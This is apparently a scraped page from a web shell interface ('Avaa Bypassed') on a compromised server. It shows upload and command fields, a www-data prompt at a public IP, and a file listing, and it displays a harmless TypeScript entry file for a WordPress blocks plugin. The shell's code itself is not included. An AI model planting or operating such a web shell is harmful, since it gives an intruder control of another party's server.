[ Avaa Bypassed ]




Upload:

Command:

www-data@3.16.160.142: ~ $
import { registerBlocks } from "./blocks";
import "./editor.scss";
import {
	autoRecoverBlocks,
	disableBlocks,
	setSectionDefaultWidth,
	updateBlockAttributes,
	updateBlockCategoryIcon,
} from "./helpers";

disableBlocks();

setSectionDefaultWidth();

//Register blocks.
registerBlocks();

updateBlockAttributes(); // update old attributes.
updateBlockCategoryIcon(); // Update Magazine Blocks category icon.
autoRecoverBlocks(); // Auto recover blocks in widget/customize screen.

Filemanager

Name Type Size Permission Actions
blocks Folder 0777
css Folder 0777
types Folder 0777
index.ts File 482 B 0644